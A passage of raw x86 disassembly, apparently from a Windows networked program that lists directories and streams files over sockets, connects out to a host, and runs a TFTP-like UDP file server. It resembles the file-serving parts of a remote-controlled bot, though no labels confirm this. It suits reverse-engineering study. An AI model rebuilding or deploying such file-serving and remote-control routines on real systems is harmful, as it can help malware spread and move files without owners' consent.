cmp eax, 0FFFFFFFFh
jnz short loc_406B04
push [ebp+s]
jmp short loc_406B80
; ---------------------------------------------------------------------------
loc_406B01: ; CODE XREF: sub_4069DA+11B�j
mov [ebp+var_4], esi
loc_406B04: ; CODE XREF: sub_4069DA+120�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_406B11
mov [ebp+var_4], esi
loc_406B11: ; CODE XREF: sub_4069DA+132�j
mov ebx, [ebp+s]
cmp [ebp+var_4], edi
mov [ebp+Parameter], ebx
mov [ebp+var_318], edi
jz short loc_406B8B
cmp [ebp+arg_C], edi
jz short loc_406B7F
lea eax, [ebp+var_314]
push 42AFB0h
push eax
call sub_417FF0
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_41795B
lea eax, [ebp+var_210]
push eax
call sub_4073C7
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_41795B
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_406BDA
; ---------------------------------------------------------------------------
loc_406B7F: ; CODE XREF: sub_4069DA+14E�j
push ebx ; s
loc_406B80: ; CODE XREF: sub_4069DA+125�j
call closesocket_0
jmp loc_406C70
; ---------------------------------------------------------------------------
loc_406B8B: ; CODE XREF: sub_4069DA+149�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call dword ptr byte_424084
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_406BDA
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_41795B
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call dword ptr byte_42409C
push esi
mov [ebp+var_330], eax
call dword ptr byte_424074+4
loc_406BDA: ; CODE XREF: sub_4069DA+1A3�j
; sub_4069DA+1CE�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push 42AF70h
push eax
call sub_41795B
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_41741F
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov [eax+44B86Ch], esi
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push edi ; dwCreationFlags
push eax ; lpParameter
push offset StartAddress ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov [ecx+44B87Ch], eax
jnz short loc_406C7F
push ebx ; s
call closesocket_0
call GetLastError
push eax
lea eax, [ebp+var_8C4]
push 42AF28h
push eax
call sub_41795B
lea eax, [ebp+var_8C4]
push eax
call sub_40CB08
add esp, 10h
loc_406C70: ; CODE XREF: sub_4069DA+1AC�j
; sub_4069DA+2AD�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406C77: ; CODE XREF: sub_4069DA+2AB�j
push 5 ; dwMilliseconds
call Sleep ; Sleep
loc_406C7F: ; CODE XREF: sub_4069DA+266�j
cmp [ebp+var_318], edi
jz short loc_406C77
jmp short loc_406C70
sub_4069DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406C89(int, SOCKET s, int, int)
sub_406C89 proc near ; CODE XREF: StartAddress+153�p
; sub_40FCA3+4C90�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
FileTime = FILETIME ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
buf = byte ptr -248h
var_48 = byte ptr -48h
LocalFileTime = _FILETIME ptr -20h
SystemTime = _SYSTEMTIME ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
s = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_4179E0
mov edi, [ebp+arg_0]
push 42AFB4h
push edi
call sub_419260
add esp, 14h
cmp [ebp+arg_8], ebx
push edi
jz short loc_406CE8
push [ebp+arg_8]
mov esi, 200h
lea eax, [ebp+buf]
push 42B420h
push esi
push eax
call sub_417EDA
add esp, 14h
jmp loc_406DE4
; ---------------------------------------------------------------------------
loc_406CE8: ; CODE XREF: sub_406C89+3B�j
cmp [ebp+arg_C], ebx
jz loc_406DCA
call sub_4180D0
mov [eax+edi-1], bl
push edi
mov esi, 200h
push 42B3E0h
lea eax, [ebp+buf]
push esi
push eax
call sub_417EDA
add esp, 14h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
push edi
push 42B3B4h
lea eax, [ebp+buf]
push esi
push eax
call sub_417EDA
add esp, 10h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
push edi
call sub_4180D0
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push 42B318h
lea eax, [ebp+buf]
push esi
push eax
call sub_417EDA
add esp, 1Ch
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
push 42B2E8h
lea eax, [ebp+buf]
push esi
push eax
call sub_417EDA
add esp, 0Ch
jmp short loc_406DE4
; ---------------------------------------------------------------------------
loc_406DCA: ; CODE XREF: sub_406C89+62�j
mov esi, 200h
push 42B2D4h
lea eax, [ebp+buf]
push esi
push eax
call sub_417EDA
add esp, 10h
loc_406DE4: ; CODE XREF: sub_406C89+5A�j
; sub_406C89+13F�j
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
cmp [ebp+arg_C], ebx
jz short loc_406E7C
push [ebp+arg_C]
call sub_4180D0
cmp eax, 2
pop ecx
jbe short loc_406E7C
push [ebp+arg_C]
call sub_4180D0
sub eax, 3
pop ecx
jz short loc_406E30
loc_406E24: ; CODE XREF: sub_406C89+1A5�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_406E30
dec eax
jnz short loc_406E24
loc_406E30: ; CODE XREF: sub_406C89+199�j
; sub_406C89+1A2�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_419300
lea eax, [ebp+var_594]
push eax
push 42B280h
lea eax, [ebp+buf]
push esi
push eax
call sub_417EDA
add esp, 1Ch
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
loc_406E7C: ; CODE XREF: sub_406C89+17D�j
; sub_406C89+18B�j
lea eax, [ebp+var_388]
push eax
push edi
call dword ptr byte_4240B0+4
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call dword ptr byte_4240B0
test eax, eax
jz loc_407273
mov edi, 1FFh
loc_406EA8: ; CODE XREF: sub_406C89+5E4�j
cmp [ebp+var_388], ebx
jz loc_40725B
lea eax, [ebp+var_35C]
push 42B278h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_40725B
lea eax, [ebp+var_35C]
push 42B274h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_40725B
lea eax, [ebp+LocalFileTime]
push eax ; lpLocalFileTime
lea eax, [ebp+FileTime]
push eax ; lpFileTime
call FileTimeToLocalFileTime ; FileTimeToLocalFileTime
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
lea eax, [ebp+LocalFileTime]
push eax ; lpFileTime
call FileTimeToSystemTime ; FileTimeToSystemTime
mov ax, [ebp+SystemTime.wHour]
mov ecx, 42B270h
cmp ax, 0Ch
ja loc_406FA5
mov ecx, 42B26Ch
movzx eax, ax
loc_406F24: ; CODE XREF: sub_406C89+322�j
push ecx
movzx ecx, [ebp+SystemTime.wMinute]
push ecx
push eax
movzx eax, [ebp+SystemTime.wYear]
push eax
movzx eax, [ebp+SystemTime.wDay]
push eax
movzx eax, [ebp+SystemTime.wMonth]
push eax
lea eax, [ebp+var_48]
push 42B24Ch
push eax
call sub_41795B
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_4070DC
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_406FB0
lea eax, [ebp+var_35C]
push eax
push 42B244h
lea eax, [ebp+var_490]
push 106h
push eax
call sub_417EDA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+buf]
push [ebp+arg_8]
push 42B228h
push esi
push eax
call sub_417EDA
add esp, 28h
jmp loc_40722C
; ---------------------------------------------------------------------------
loc_406FA5: ; CODE XREF: sub_406C89+28D�j
movzx eax, ax
sub eax, 0Ch
jmp loc_406F24
; ---------------------------------------------------------------------------
loc_406FB0: ; CODE XREF: sub_406C89+2D5�j
cmp [ebp+arg_C], ebx
jz loc_40709A
push 0E6h
push 42B208h
lea eax, [ebp+buf]
push edi
push eax
call sub_417EDA
add esp, 10h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+buf]
push [ebp+arg_C]
push 42B200h
push edi
push eax
call sub_417EDA
add esp, 14h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
lea eax, [ebp+var_35C]
push eax
call sub_4180D0
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+buf]
jbe short loc_407056
push 42B1E0h
jmp short loc_40705B
; ---------------------------------------------------------------------------
loc_407056: ; CODE XREF: sub_406C89+3C4�j
push 42B1C8h
loc_40705B: ; CODE XREF: sub_406C89+3CB�j
push edi
push eax
call sub_417EDA
add esp, 10h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push 42B160h
push edi
jmp loc_40721D
; ---------------------------------------------------------------------------
loc_40709A: ; CODE XREF: sub_406C89+32A�j
lea eax, [ebp+var_35C]
push eax
push 42B244h
lea eax, [ebp+var_490]
push 106h
push eax
call sub_417EDA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push 42B150h
loc_4070C7: ; CODE XREF: sub_406C89+47B�j
lea eax, [ebp+buf]
push esi
push eax
call sub_417EDA
add esp, 24h
jmp loc_40722C
; ---------------------------------------------------------------------------
loc_4070DC: ; CODE XREF: sub_406C89+2C9�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_407106
push ebx
push [ebp+var_368]
call sub_40DB83
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push 42B128h
jmp short loc_4070C7
; ---------------------------------------------------------------------------
loc_407106: ; CODE XREF: sub_406C89+459�j
cmp [ebp+arg_C], ebx
jz loc_407206
push 0E6h
push 42B208h
lea eax, [ebp+buf]
push edi
push eax
call sub_417EDA
add esp, 10h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+buf]
push [ebp+arg_C]
push 42AFB8h
push edi
push eax
call sub_417EDA
add esp, 14h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
lea eax, [ebp+var_35C]
push eax
call sub_4180D0
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+buf]
jbe short loc_4071AC
push 42B108h
jmp short loc_4071B1
; ---------------------------------------------------------------------------
loc_4071AC: ; CODE XREF: sub_406C89+51A�j
push 42B0F0h
loc_4071B1: ; CODE XREF: sub_406C89+521�j
push edi
push eax
call sub_417EDA
add esp, 10h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push 42B088h
lea eax, [ebp+buf]
push edi
push eax
call sub_417EDA
add esp, 1Ch
jmp short loc_40722C
; ---------------------------------------------------------------------------
loc_407206: ; CODE XREF: sub_406C89+480�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push 42B068h
push esi
loc_40721D: ; CODE XREF: sub_406C89+40C�j
lea eax, [ebp+buf]
push eax
call sub_417EDA
add esp, 18h
loc_40722C: ; CODE XREF: sub_406C89+317�j
; sub_406C89+44E�j ...
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
cmp [ebp+arg_8], ebx
jz short loc_40725B
push 7D0h ; dwMilliseconds
call Sleep ; Sleep
loc_40725B: ; CODE XREF: sub_406C89+225�j
; sub_406C89+240�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call dword ptr byte_4240B0
test eax, eax
jnz loc_406EA8
loc_407273: ; CODE XREF: sub_406C89+214�j
push [ebp+arg_0]
call dword ptr byte_42409C+8
cmp [ebp+arg_8], ebx
jz short loc_4072B6
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40DB83
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_40DB83
pop ecx
pop ecx
push eax
lea eax, [ebp+buf]
push [ebp+arg_8]
push 42B038h
push eax
call sub_41795B
add esp, 14h
jmp short loc_4072E4
; ---------------------------------------------------------------------------
loc_4072B6: ; CODE XREF: sub_406C89+5F6�j
cmp [ebp+arg_C], ebx
lea eax, [ebp+buf]
jz short loc_4072D0
push 42AFF0h
push eax
call sub_41795B
pop ecx
pop ecx
jmp short loc_4072E4
; ---------------------------------------------------------------------------
loc_4072D0: ; CODE XREF: sub_406C89+636�j
push [ebp+var_8]
push [ebp+var_4]
push 42AFC4h
push eax
call sub_41795B
add esp, 10h
loc_4072E4: ; CODE XREF: sub_406C89+62B�j
; sub_406C89+645�j
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_406C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40730A(SOCKET s, int)
sub_40730A proc near ; CODE XREF: StartAddress+135�p
buf = byte ptr -404h
var_4 = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call dword ptr byte_424084
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4073C2
push esi
push ebx
call dword ptr byte_42409C
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_4073BB
loc_40734F: ; CODE XREF: sub_40730A+AF�j
push 400h
lea eax, [ebp+buf]
push esi
push eax
call sub_4179E0
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_40736C
mov edi, [ebp+arg_4]
loc_40736C: ; CODE XREF: sub_40730A+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call dword ptr byte_4240B0+8
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+buf]
push edi
push eax
push ebx
call dword ptr byte_424074
push esi ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
call send_0
cmp eax, 0FFFFFFFFh
jnz short loc_4073B6
call WSAGetLastError ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4073BB
xor eax, eax
loc_4073B6: ; CODE XREF: sub_40730A+9B�j
sub [ebp+arg_4], eax
jnz short loc_40734F
loc_4073BB: ; CODE XREF: sub_40730A+43�j
; sub_40730A+A8�j
push ebx
call dword ptr byte_424074+4
loc_4073C2: ; CODE XREF: sub_40730A+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_40730A endp
; =============== S U B R O U T I N E =======================================
sub_4073C7 proc near ; CODE XREF: sub_4069DA+17B�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_4180D0
test eax, eax
pop ecx
jbe short loc_4073F0
loc_4073DA: ; CODE XREF: sub_4073C7+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_4073E4
mov byte ptr [esi+edi], 2Fh
loc_4073E4: ; CODE XREF: sub_4073C7+17�j
push edi
inc esi
call sub_4180D0
cmp esi, eax
pop ecx
jb short loc_4073DA
loc_4073F0: ; CODE XREF: sub_4073C7+11�j
mov eax, edi
pop edi
pop esi
retn
sub_4073C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4073F5(SOCKET s, int, int, int, int, u_short hostshort, int, int, int)
sub_4073F5 proc near ; CODE XREF: sub_40FCA3+2CAC�p
WSAData = WSAData ptr -4A0h
var_310 = dword ptr -310h
buf = byte ptr -110h
name = sockaddr ptr -10h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
hostshort = word ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+WSAData]
push edi
push eax ; lpWSAData
push 101h ; wVersionRequested
call WSAStartup_0
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket_0
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+name]
push edi
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
push [ebp+arg_10] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_40B862
pop ecx
mov dword ptr [ebp+name.sa_data+2], eax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push ebx ; s
call connect_0
cmp eax, 0FFFFFFFFh
jz short loc_4074D2
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_40746E
mov eax, 440F9Ch
loc_40746E: ; CODE XREF: sub_4073F5+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+buf]
push [ebp+arg_1C]
push [ebp+arg_18]
push 42B440h
push esi
push eax
call sub_417EDA
add esp, 1Ch
lea eax, [ebp+buf]
push edi ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push ebx ; s
call send_0
push esi
lea eax, [ebp+buf]
push edi
push eax
call sub_417A40
add esp, 0Ch
lea eax, [ebp+buf]
push edi ; flags
push esi ; len
push eax ; buf
push ebx ; s
call recv_0
pop esi
loc_4074D2: ; CODE XREF: sub_4073F5+6B�j
push ebx ; s
call closesocket_0
call WSACleanup_0
lea eax, [ebp+buf]
push eax
lea eax, [ebp+var_310]
push eax
call sub_41795B
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_407512
push edi ; int
lea eax, [ebp+var_310]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_407512: ; CODE XREF: sub_4073F5+102�j
pop edi
pop ebx
leave
retn
sub_4073F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_407516(LPVOID)
sub_407516 proc near ; CODE XREF: sub_407516:loc_4079FB�p
; DATA XREF: sub_407B48+108�o ...
readfds = fd_set ptr -884h
var_780 = dword ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
hostshort = word ptr -168h
var_164 = dword ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
buf = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
name = sockaddr ptr -44h
timeout = timeval ptr -34h
from = sockaddr ptr -2Ch
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
s = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
tolen = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, 42B5ECh
lea edi, [ebp+var_1C]
movsd
movsw
xor ebx, ebx
xor eax, eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx ; protocol
inc eax
push 2 ; type
rep movsd
inc [ebp+var_16C]
push 2 ; af
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call socket_0
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+s], edi
jnz short loc_4075D9
push 190h ; dwMilliseconds
call Sleep ; Sleep
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push 42B5A8h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_4075B9
push ebx ; int
lea eax, [ebp+var_780]
push [ebp+var_E4] ; int
push eax ; int
lea eax, [ebp+var_164]
push eax ; int
push [ebp+var_37C] ; s
call sub_40E1D6
add esp, 14h
loc_4075B9: ; CODE XREF: sub_407516+7E�j
lea eax, [ebp+var_780]
push eax
call sub_40CB08
push [ebp+var_170]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4075D9: ; CODE XREF: sub_407516+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov [eax+44B874h], edi
lea eax, [ebp+name]
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
mov dword ptr [ebp+name.sa_data+2], ebx
call bind_0
cmp eax, 0FFFFFFFFh
jnz short loc_40763E
push 1388h ; dwMilliseconds
call Sleep ; Sleep
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_4079FB
; ---------------------------------------------------------------------------
loc_40763E: ; CODE XREF: sub_407516+10D�j
lea eax, [ebp+var_378]
push 42ACB0h
push eax
call sub_41924D
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_4076BC
push 190h ; dwMilliseconds
call Sleep ; Sleep
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push 42B570h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_780]
push [ebp+var_E4] ; int
push eax ; int
lea eax, [ebp+var_164]
push eax ; int
push [ebp+var_37C] ; s
call sub_40E1D6
lea eax, [ebp+var_780]
push eax
call sub_40CB08
push [ebp+var_170]
call sub_417735
add esp, 28h
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4076BC: ; CODE XREF: sub_407516+140�j
mov esi, 200h
loc_4076C1: ; CODE XREF: sub_407516+49F�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_4079BB
mov [ebp+readfds.fd_array], edi
mov edi, 80h
push edi
lea eax, [ebp+buf]
push ebx
push eax
mov [ebp+timeout.tv_sec], 5
mov [ebp+timeout.tv_usec], 1388h
mov [ebp+readfds.fd_count], 1
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+timeout]
push eax ; timeout
push ebx ; exceptfds
lea eax, [ebp+readfds]
push ebx ; writefds
push eax ; readfds
push ebx ; nfds
call select_0
test eax, eax
jle loc_4079AF
mov al, CommandLine
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+tolen], 10h
rep stosd
stosw
stosb
mov edi, [ebp+s]
lea eax, [ebp+tolen]
push eax ; fromlen
lea eax, [ebp+from]
push eax ; from
push ebx ; flags
lea eax, [ebp+buf]
push 80h ; len
push eax ; buf
push edi ; s
call recvfrom ; recvfrom
push dword ptr [ebp+from.sa_data+2] ; in
mov [ebp+var_C], eax
call inet_ntoa_0
push eax
lea eax, [ebp+var_58]
push eax
call sub_41795B
cmp [ebp+buf], bl
pop ecx
pop ecx
jnz loc_407999
cmp [ebp+var_D7], 1
jnz loc_4078EB
lea eax, [ebp+var_274]
push eax
call sub_4180D0
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_4180D0
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_419400
add esp, 14h
test eax, eax
jnz loc_4078A5
lea eax, [ebp+var_1C]
push eax
call sub_4180D0
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_419400
add esp, 10h
test eax, eax
jnz loc_4078A5
push ebx
push ebx
push [ebp+var_8]
call sub_4191A1
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_418F61
add esp, 1Ch
lea ecx, [ebp+from]
mov [ebp+var_C], eax
add eax, 4
push [ebp+tolen] ; tolen
push ecx ; to
push ebx ; flags
push eax ; len
lea eax, [ebp+var_580]
push eax ; buf
push edi ; s
call sendto ; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push 42B528h
loc_407859: ; CODE XREF: sub_407516+47E�j
lea eax, [ebp+var_780]
push eax
call sub_41795B
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_407893
push ebx ; int
lea eax, [ebp+var_780]
push [ebp+var_E4] ; int
push eax ; int
lea eax, [ebp+var_164]
push eax ; int
push [ebp+var_37C] ; s
call sub_40E1D6
add esp, 14h
loc_407893: ; CODE XREF: sub_407516+358�j
lea eax, [ebp+var_780]
push eax
call sub_40CB08
pop ecx
jmp loc_4079AF
; ---------------------------------------------------------------------------
loc_4078A5: ; CODE XREF: sub_407516+2B6�j
; sub_407516+2D7�j
push [ebp+tolen] ; tolen
lea eax, [ebp+from]
push eax ; to
push ebx ; flags
push 13h ; len
push offset unk_42B510 ; buf
push edi ; s
call sendto ; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+buf]
push 42B4DCh
push eax
call sub_41795B
lea eax, [ebp+buf]
push eax
call sub_40CB08
add esp, 14h
jmp loc_4079AF
; ---------------------------------------------------------------------------
loc_4078EB: ; CODE XREF: sub_407516+275�j
cmp [ebp+var_D7], 4
jnz loc_407999
mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_407922
inc al
xor cl, cl
mov [ebp+var_57D], bl
jmp short loc_40792A
; ---------------------------------------------------------------------------
loc_407922: ; CODE XREF: sub_407516+3FE�j
inc cl
mov [ebp+var_57D], cl
loc_40792A: ; CODE XREF: sub_407516+40A�j
mov [ebp+var_57E], al
push ebx
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_4191A1
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_418F61
add esp, 1Ch
mov edi, eax
lea eax, [ebp+from]
mov [ebp+var_C], edi
push [ebp+tolen] ; tolen
push eax ; to
lea eax, [edi+4]
push ebx ; flags
push eax ; len
lea eax, [ebp+var_580]
push eax ; buf
push [ebp+s] ; s
call sendto ; sendto
cmp edi, ebx
jnz short loc_4079AF
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push 42B488h
jmp loc_407859
; ---------------------------------------------------------------------------
loc_407999: ; CODE XREF: sub_407516+268�j
; sub_407516+3DC�j
push [ebp+tolen] ; tolen
lea eax, [ebp+from]
push eax ; to
push ebx ; flags
push 9 ; len
push offset unk_42B478 ; buf
push edi ; s
call sendto ; sendto
loc_4079AF: ; CODE XREF: sub_407516+204�j
; sub_407516+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+s]
jg loc_4076C1
loc_4079BB: ; CODE XREF: sub_407516+1B4�j
push edi ; s
call closesocket_0
push [ebp+var_8]
call sub_418F0B
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_4079EF
push [ebp+var_170]
call sub_417735
pop ecx
